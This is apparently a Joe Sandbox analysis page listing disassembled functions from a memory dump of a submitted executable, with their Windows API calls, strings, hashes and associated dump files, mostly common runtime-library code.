Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 687729372eea9e8036fa62992e2affa05c689afd6e129f8f5615b9d4bf0c6b80
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: DE11E332E2CA0311F654292AD6D537911436F64374F5D46B4E96E867FFCE2CA840BD10

Function 00007FF6399CA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA6BF
FlsSetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA6DE
FlsSetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA706
FlsSetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA717
FlsSetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA728

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
Instruction ID: 616731654ac5313871304ea53e7858ee5329dbaa38d0306afdec4538b80d1c75
Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
Instruction Fuzzy Hash: BE117C20E0E24206FA58AB655E5127921976F983A0F0C4334E83E867DFEE2CB841AF11

Function 00007FF6399CA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6399CA545
FlsSetValue.KERNEL32 ref: 00007FF6399CA564
FlsSetValue.KERNEL32 ref: 00007FF6399CA58C
FlsSetValue.KERNEL32 ref: 00007FF6399CA59D
FlsSetValue.KERNEL32 ref: 00007FF6399CA5AE

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
Instruction ID: 0123f9c87a89a9f348466eec0b3e4342375da3dae7cdb4eaab8933bd94cd9a32
Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
Instruction Fuzzy Hash: F611D620E0A2474AFA586B655D6117D22835F89360E5C9734D93E8A3DBED2CB8817F11

Function 00007FF6399C52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C52EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C5416
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C54CC

Strings

verbose, xrefs: 00007FF6399C52C0

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: e14dc18eaa456c9566f132e3d9cf46df633b3d18ba670df6c43864452c121b3a
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: 3D91AF32E0CA8681F7219E25D85037D3793AB44B94F8C4136DA5E863DADF3CE845AF12

Function 00007FF6399CEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CF1B7

Part of subcall function 00007FF6399C6D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C6D69

Strings

UTF-8, xrefs: 00007FF6399CF136
UTF-16LEUNICODE, xrefs: 00007FF6399CF155
ccs, xrefs: 00007FF6399CF0F2

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 9cd56ff8041044eda6bc6902418fb3dec94250f8e92ca2bd75bc37c3c5ef0fbf
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: 95815C76E0824385FB658F25C95027926A2EB11B48F5D8035DA0AD73DFDF2DEA41BF01

Function 00007FF6399BC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6399BC993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6399BCA2A
RtlUnwindEx.KERNEL32 ref: 00007FF6399BCA84

Strings

csm, xrefs: 00007FF6399BCA11

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: 85cf7ff13a125c7414c83070885c193e3d953da524b5bbdc941579f05ae13c1c
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: C2518E32B196128ADB14CF19E454A7D77A2EB44B88F598135EA4D837CEEF7CE841DB00

Function 00007FF6399BE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6399BE257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6399BE2A3

Strings

RCC, xrefs: 00007FF6399BE273
MOC, xrefs: 00007FF6399BE26B

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction ID: 79c36cdff3358c03c3d1288033f1d13034dc29a003133925db73eb7d99d5ae38
Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction Fuzzy Hash: F361A132908BC585E7248F65E4403AAB7B5FB88784F084225EB9D43BDADF7CE090DB40

Function 00007FF6399BE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6399BE5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6399BE6B8

Strings

csm, xrefs: 00007FF6399BE5F2
csm, xrefs: 00007FF6399BE70A

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: 8c3e25beb30d50782ae50a1a25a609d96fe1aad7d1e1f1e23ca099929f338b1b
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: 18519137908246CAEB688FA1909836877BAEB54B84F1C4135DA5D87BDACF3CE4509F41

Function 00007FF6399B7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6399B324C,?,?,00007FF6399B3964), ref: 00007FF6399B7642

Strings

%s%c, xrefs: 00007FF6399B75B4
\, xrefs: 00007FF6399B75A7
%.*s, xrefs: 00007FF6399B75FB

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction ID: 8846fdd1bb4b4233eed4c4826b2616586a46262ca5fd9c71381376cdd8869245
Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction Fuzzy Hash: E131CC21A19AC585EA219F15E8507E66366FF44BE0F484331EE6DC3BCEDE3CD6059B00

Function 00007FF6399B25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

MessageBoxW.USER32 ref: 00007FF6399B2686
MessageBoxA.USER32 ref: 00007FF6399B269A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF6399B268E
Error, xrefs: 00007FF6399B2677

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)
API String ID: 1878133881-653037927
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 16e0cd8b1f2bb6fd58d8a27bb4461ba4fa10eaf816b73712c1ced64da12dcc66
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: B2116D72A28B8681FA208F10F491BA97365FF48B84F94513ADA4D8778ADF3DD605DB40

Function 00007FF6399B2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

MessageBoxW.USER32 ref: 00007FF6399B2906
MessageBoxA.USER32 ref: 00007FF6399B291A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF6399B290E
Warning, xrefs: 00007FF6399B28F7

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: 559decaf77f2357d81b21f6d0e5b6c65bbe813e5ed0b16b6e83943f70d842585
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 13116072628B8681FA208F10F491BA97365FF44B84F945136DA4D8778ADF3DD605DB40

Function 00007FF6399CB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6399CB92F
WriteFile.KERNEL32 ref: 00007FF6399CBBF7
WriteFile.KERNEL32 ref: 00007FF6399CBC3D
GetLastError.KERNEL32 ref: 00007FF6399CBCF3

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction ID: 522991cfb172185b3d0181259fdc16485db0645afec835f0a40e5d5d2d729499
Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction Fuzzy Hash: C3D1E372F48A8289E711CF69D8402AC37B2FB54798B184235CE5E97BDEDE38D516DB00

Function 00007FF6399CEC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6399CED8C
_get_daylight.LIBCMT ref: 00007FF6399CED9D
_get_daylight.LIBCMT ref: 00007FF6399CEDAE
_isindst.LIBCMT ref: 00007FF6399CEE79

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction ID: 436be9184717e38a6bf95ebf827e312c0b44ee37a2a5574a26544e2e8a39da9b
Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction Fuzzy Hash: D551E772F042158FFB24DFA89D556BC27A2AB10399F580135DD1E97BEADF38A8019F00

Function 00007FF6399C4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6399C4ABF
GetFileInformationByHandle.KERNEL32 ref: 00007FF6399C4B21
GetLastError.KERNEL32 ref: 00007FF6399C4BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6399C49C4), ref: 00007FF6399C4BFE

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction ID: 0f1b07eacf3df4d079e50d352f0a95682faf805fb36bbea8a3f3ab395b8af27a
Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction Fuzzy Hash: 9B515A22F086428AFB14CF71D8513BD23A2AB58B98F188535DE0A877DEDF38D4819F50

Function 00007FF6399B2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6399B2064
SetWindowLongPtrW.USER32 ref: 00007FF6399B2086
GetWindowLongPtrW.USER32 ref: 00007FF6399B20B0
InvalidateRect.USER32 ref: 00007FF6399B20D0

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: 603266708baba3f9ddabf25398ad0796a066ed683afdfd336174356a0526ee19
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: 1C11A921E0814642FA559F69E5842BD52A3EF99B80F8C8031DE498BBDFCD3DD4C1AB40

Function 00007FF6399D4E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399D0A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D0AA3

_get_daylight.LIBCMT ref: 00007FF6399D4F44
_get_daylight.LIBCMT ref: 00007FF6399D4F55

Strings

?, xrefs: 00007FF6399D4ED5

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction ID: fe72fabdda4bc426cb955c9b0f78cef64411df7b5e74fe6b4291b00e7cf3a812
Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction Fuzzy Hash: 1A41F912B0868296FB249F259481379A756EF90BA4F184235EE5D86BEFDF3CD4819F00

Function 00007FF6399C832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C835E

Part of subcall function 00007FF6399C9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C6E
Part of subcall function 00007FF6399C9C58: GetLastError.KERNEL32(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6399BBEC5), ref: 00007FF6399C837C

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00007FF6399C836A

